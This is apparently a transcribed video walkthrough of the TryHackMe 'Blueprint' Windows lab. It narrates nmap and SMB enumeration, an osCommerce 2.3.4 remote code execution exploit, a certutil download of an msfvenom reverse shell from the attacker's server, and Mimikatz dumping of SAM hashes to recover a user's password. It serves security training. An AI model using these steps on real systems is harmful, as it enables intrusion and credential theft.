Hey guys, it's Ben here, and today I'm going to be walking through the Blueprint Try Hackney Challenge. So this is a Windows machine, it's easy rated, and it was quite a fun one. It's fairly straightforward, so yeah, let's get into it. We are of course given an IP address, so we can start off doing our regular enumeration on reconnaissance. So I've got a directory called Blueprint Walkthrough Setup, and I'm going to make some further directories. I'm going to make exploits, nmap, recon and recon nmap, like so. I'm going to cd into recon nmap, and I'm going to start doing some nmap scans just to get an idea of what ports are open on this system. So we'll do nmap, put the IP in there. I'm not going to do a full port scan. I'm going to do the top ports at 1500. Should give me a good amount of ports to start with. T4 for a speedy output. Do verbose just to get it will tell us the ports as we go along, and I'm going to output this to fasttcp.log. This obviously isn't going to be a thorough scan, but it's going to give us a lot of stuff to work with. We've got a load of ports here. We don't know the services for sure because we haven't done a service or a version enumeration scan, so we just know, look, there is a port open on these numbers, and it's most likely going to be HTTP, MSRPC, etc. To confirm the fact, or to confirm the service which is running, we can actually do a service scan, and we can specify the ports to scan on. So I'm just going to do these interesting ones to begin with. So we've got 80, which is HTTP, or it thinks it's HTTP. We've got 135, 139, 443, 445, 306, 8080. So we've got a good amount of ports here. I'm going to do a service and default scripts, and I'm going to output this to thorough tcp.log. So it's discovering the ports again. We do know that there's port 80 and port 443. Let's check these out because it's saying that HTTP, a way to confirm this is to actually visit them. This one seems to hang for quite a while, and then we do get eventually 404 not found and server error. This may look like IIS to you, and we can confirm that by saying, look, the web server which is running is IIS 7.5. So this is running on a Windows server. So what about the HTTPS? Let's have a look at this. And we get a security warning, which is most likely to be because there's a cert in use, and it's probably a self-signed cert. So yeah, it's a self-signed cert, which if we go to advanced, look, self-signed, we can just accept that risk and continue because there is no risk. This is a CTF challenge, right? So obviously this doesn't return anything, so we could obviously do some directory enumeration. We could do some fuzzing to see if there are any files or directories. But I won't for the meantime, just because we've got stuff to work on here. We can see, look, there's this OS Commerce 2.3.4, which is interesting. So we can go to this, and then it takes us to we're in this OS Commerce 2.3.4 directory, and there are two further directories, catalog and docs. We can also see, it looks like, this looks like the Apache web server here. We can see it there, 2.4.3.2 on Win32, so we've got an idea of the version of Windows. We can go back just to our nmap scan to have a look what it's found. It will confirm a lot of the things we've already found, like, look, we've figured out, look, this is an IIS web server on port 80. I don't know why I scanned port 130, I didn't mean to. I think that's maybe 139. I will go back and do that again. It gives us the certificate here when we scan the port 443, the HTTPS, and it does confirm, look, there's an Apache web server. It gives us those files which we found so far, and we can also see, look, yeah, it's signed by localhost, it's self-signed. 445, we've got some SMB going on. it also reveals like the version of SMB. So look, there's Windows 7, which may stand out like straight away. You could possibly try some Eternal Blue stuff. We could try some exploits around that, some kernel exploits, but I'm not going to get. There's a lot of ideas here, right? There's lots of different options. We need to enumerate SMB, but let's carry on looking at this web page just for a little while longer, and then I'll go back. We've got docs and catalogs. If you go to the docs directory, it looks like we've got some perhaps documentation on here. I'm just not too interesting. We could, if we get stuck, dig into this deeper, but at the moment I'm just having a little look around, seeing if anything stands out. In this catalogue, it looks like we've got some sort of website here, and then it's powered by this OS Commerce. So perhaps this like OS Commerce is like a thing which people use. And if you go in the web technologies, we can see, look, there is this OS Commerce e-commerce web technology in use. So this is a real thing. So we could obviously search up, is there any vulnerabilities in OS Commerce 2.3.4? Let's just have a look, OS Commerce. And straight away, just searching this, we get remote command execution, RCE. So there is a good chance this is vulnerable. And because this is on the CTF challenge, this is probably, we don't know for sure until we try it, this is one route we can go down. So I'll keep this idea in my head, and I will go back and do some SMB enumeration. So I'm going to make another. Let's get out of that. Let's go back out of the nmap directory and let's make directory SMB. I'm just going to do some enum for Linux. It's a good tool. I've got the IP address there. No, I don't. Enum for Linux. Let's get that. Enum for Linux. Pop the IP in there. We'll tee this to enum for Linux.log, and we'll see what we can find. So it gives us an idea of the domain / work group. We get some status access denied. We don't find a lot. Are there any shares? It doesn't look like there's any shares. There could be shares, but we may not be able to access them. So perhaps this is a bit locked down. We could do another SMB map just to confirm this. Look, is there any shares in use? Scan this. Doesn't show anything. We could obviously try some SMB client with null authentication, but this sort of looks like a dead end. There isn't a lot of juicy, vulnerable content directly involved with this SMB stuff. So I'm going to go back to this OS Commerce because this looks interesting, right? We've got this remote command execution with this specific version, and we can read about the vulnerability. So there's a remote command execution when the / install directory wasn't removed by admin. And we can see there it's in the catalog / install. So perhaps we can just see, is there an install directory? This may indicate whether it's vulnerable, and it does. We can see this install directory hasn't been removed by the admin. So perhaps this is the way to do. This is the way to go. We should exploit this. We should try exploit this. So I am going to download this POC, and I'm going to make a directory exploits. I think I've already got one. I'll cd into the exploits directory, and I'm going to git clone this. So it's cloned it. We've got the POC down on our box. I'm going to cd into this directory, and let's just have a look at this oscommerce.py. So it gives a bit of information about it. It tells you the format, so it looks like we need to use Python 3, and then we supply the POC here, and then we supply the URL to the catalog directory. And then it tests for the vulnerable base URL, it sets this as a variable, and then it does some RCE. It creates this payload, which is like a pass-through, and then the command goes in there, so we can inject system command with this pass-through function. And where is this payload actually sent? So let's just keep an eye for this, because the payload variable is set up here. Oh look, it's put in the data parameter of DB database. So this payload is put in this DB database parameter, and it's posted it. So it's posting this data variable. So it looks like we're posting something to this install.php step 4, which is the finish step. And when we post to that, we supply data, and that data contains our payload. So we can just test this, right? We can try execute this and see if this works. We may need to change it. We may need to do some playing around. So oscommerce.py, and then the website we're targeting is this here, and we supply it up to the category directory, and we will paste this in here. And I'm gonna zoom open a little bit. I do want to let's just open this oscommerce.rce. Let's see, do we have to supply a command anywhere, or is there like a default command it runs? It looks like it runs the command who am I to begin with, and then there's a while true. So I guess it's doing, after it's attempting to run this command while true, we put some input in for RCE shell, and that's passed into this RCE function. So I guess we've got like it will run who am I to begin with, just to test. If that works, then we can just keep on inputting our remote commands to be executed. So let's run this, and we've got an issue here, right? It's saying SSL certificate has failed, certificate verify failed. So this is sort of the issue we faced when we first opened it into Firefox, and that this is actually an issue with Python's request module. It requires the cert to be valid. However, we can specify when we want it to ignore that check. We want to say, look, we're okay if the cert is invalid. So we can say, look, let's set verify to false, and let's also let's try find all these requests. So look, there's another one down here, so we can say verify is false. There's also another one down here, verify equals false. So let's try this again. Let's see if we still get this error now. And it looks like it ignores the error. There are these comments here which basically saying, look, we're not verifying the cert, so it's not happy with us. We do get a result for the who am I command. We can see, look, this is empty authority system. We're running as the local system user. We have got some RCE. So can I run like a command like dir? We'll see if this works. And look, we've got the output of the dir command. Still, there are lots of different ways where we can get RCE from here. I tried using PowerShell and going like PowerShell taxi, like write host, for example. Let's just do this. Hello world. Let's try this. And when I do this, I don't really get an output. So what about if I do PowerShell .exe write host hello world? Try that again. It doesn't look like it's working, right? So that was a bit annoying. I ended up using a lol bin. I ended up living off the land, which is basically when you use resources which are already on the box, which are exist on most machines to do malicious stuff. So lol bins, for example, I want to download a file. I want to download a payload onto the box, and with a DOS shell, just a basic command shell, it's quite hard. PowerShell, yeah, it's a lot easier. You can use like wget or like invoke web requests, and you can download stuff fairly easily. With a regular DOS shell, it's hard. However, you can use lol bins. You can live off the land and use Windows tools to do this for you. So one Windows tool which you can do, and I'll just show you this, lolbas. Let's find a website. There we go. Living off the land binaries. Say we want to do some download. Let's go /download to find binaries which are inherent to Windows to download. The one I am going to be using is certutil, and it sort of gives us the syntax of how we can download it with. So before I do this, I do want to generate a payload. I want to generate a reverse shell payload. I'm going to be using MSF Venom for this. So I can go back out of this into the exploits directory, and I'm not sure if I remember this off the top of my head. It may come up already. But yeah, I don't want to use an interpreter one. Let's just see MSF Venom cheat sheet. I may be able to reference something which works. Let's have a look. So yeah, I don't want a stage payload. I just want a basic payload. If we wanted to, it did say Win32 somewhere before. We can verify the architecture by going set processor, and it should hopefully say, look, you're on x86, so we can run x32 binaries. So let's let's copy this. Let's paste this in here, and I want to listen on port port 4444, and I want to connect back to my TON0 interface IP. I am hiding it with my face. Let me just move this. I'll show you where I'm getting this from. Up in the right hand corner here, I've got the TON, the interface IP there. So I'm just going to use it from there. And also I'm outputting this to shell x86.84. But yeah, let me just put that in. 10.14 54.171 Windows shell reverse TCP, and this should hopefully generate it in our exploits directory. We can clear this out. We've got this shell x86. So this is our reverse shell binary, which I want to get onto the box. If you recall, I was going to use the lolbins to download this. Certutil is an inherent Windows binary used for handling certificates, downloading certificates, updating certificates, etc. It can be used to download certificates, but also files via HTTP. So I'm going to host a Python HTTP server, which will contain this shell x86, and I am going to use this certutil. So certutil, you don't have to put exe. I believe it's like URL cache split tac f, I think it is. Yes, and then you just apply the HTTP server I want to download it from. I want to download it from my IP, so it's going to be 10.14.54.171. It is called shell x86.exe, like so. If we go up and we saw when we originally run the whoamiCam, we are running as local system. So if I didn't know what privileges I had, I may want to put this into a definite safe location. For example, I could put it in C /users /public. In one of those, you can tend to always write to that directory. In this case, I can put it wherever, so I'm just going to put it at the top directory and just call this shell.exe. And let's run this. We should see if this works. Evidence on this side that look, there has been a GET request with HTTP response 200, so it did work. There may be another one, and then we also get the certutil command saying, look, online URL cache command completed successfully. So we did download it. Can we get a listener going now? So nc tac nvlp 444. If you remember, I'm listening on 444. That's what I set on my MSF Venom payload. So we can listen on there, and I should be able to just execute it like this, shell.exe. And it looks like we've got a reverse shell, right? Can I do dir? I can. So I've got a reverse shell. For this challenge, I don't want to go back to that try hack me, because I've got my flags here. I've already solved this. But for this challenge, there are two flags. One of them is a flag, the root.txt, so that's going to be somewhere in the administrator user profile probably. And the other one is to find the cracked NTLM hash of the lab user, or find the password of the lab user, basically. So we'll start off by getting the the second flag, and I'm not going to actually show it, I'm just going to find it. So I can't do here, can I do clear screen? No, never mind. I'm going to cd to users. I'm going to go dir. So what users are there? There's this lab user. We want one of the flags is to find the password of the lab user, and the other one is to find the root.txt. As we are running as, let me just, that is getting in the way, my thing at the bottom. There we go. I can say who am I? I am NT Authority System, so I am local admin. I can go in the administrator directory. If we go dir here, we can see we don't know where it exactly is. Let's just start off. Is it in the desktop? Oh, dir. And there's this root.txt. So this is the root flag. I'm not going to type this out, but if you wanted to get the flag, you would just go root.txt. This would get you the flag. All good. Perfect. So we've got that. We now want to get the password of the lab user. That was the other flag. There are a few ways to do this. I'm pretty sure. One is using Mimikatz. So Mimikatz can be used to it can be used for a lot of different things, but it can use for in Active Directory environments to generate golden tickets or silver tickets, or in local Windows environments to grab the NTLM hashes. So in this context, in a local machine, the passwords are stored in two hives in the registry. One of them is called the SAM SAM.hive, and one's the security registry entry. You can download these with just regular commands, and I can't lie, I have sort of forgotten. So let's just search up dump NTLM hashes, and let's just go to an article, see if this sort of explains it. So yeah, this is not what I want to do. NTLM hash dump with Mimikatz. This is what I'm after. So dumping hashes with Mimikatz and LSA dump. Like I said, you first have to extract and copy the system and SAM registry hives, because this is where they are stored. So we can do this. We can go reg save hklm /SAM, and I'm going to save this as sam.hive. And the reason we can do this fine is because we're administrator. If we weren't administrator, if we were a low privileged user, we wouldn't be able to run these commands. So we can also save security. I think it's like that. Okay. I said earlier security, it's actually system, so that is a mistake of mine. I'm going to save that to the system.hive. When we dir these out, we can see there's the system.hive and there's the sam.hive. We do want the Mimikatz executable on this machine, so I'm going to go back to my Kali machine now. I'm going to try locate Mimikatz.exe, and we can see we've got two different executables, one for Win32, one for X64. I'm just going to use the Win32 one, and I'm just going to copy this to my directory. So I'm going to copy it to there, and we've got it here. Great. I am going to host another Python HTTP server, and I'm going to download this onto the box now. I'm going to use cert util again with URL cache split f http 10.14.54.171 mimikatz.exe, and I'm going to just output this to mimikatz.exe. So we'll run this command here. It does wait for a little bit, but hopefully we should see up here a few requests saying it's successful, and then down here we can verify it's landed on the box, saying online, saying it's completed successfully. Let's dir, see if we can see it again. And we've got the mimikatz.exe executable here. So let's just run this mimikatz.exe. Great. And then we can use the command lsa dump. So lsa dump SAM, and then we specify the SAM.hive and the system.hive. So SAM.hive and the system.hive, and we've dumped the hashes of the users. So we've got the lab NTLM hash. Instead of cracking this, opening up Hashcat or John, a thing I often do, just as a quick win, I want to check, has this been found before on the internet? So let's just go to HashStation. This is a good website. Do this, and we see it has been cracked before. And I'm not going to stay on that for too long because it spoils the password, and that is a flag. But yes, that is how you do it. You could also use John the Ripper, I think, or John the Ripper or Hashcat. I think Hashcat for MTLM is like number 1000. Let me see if it's on here somewhere. Where is the Hashcat wiki? Example hashes. I think mode 1000 is NTLM. So yeah, you could use mode 1000 with Hashcat. Pop that in there, and it would also find it with the RockU word list. For ease, I've just done it online because somebody else has done it before. So the password there is Google+, and that is both of our flags done. So yeah, I hope see you on the next one, and I hope you've enjoyed. See ya.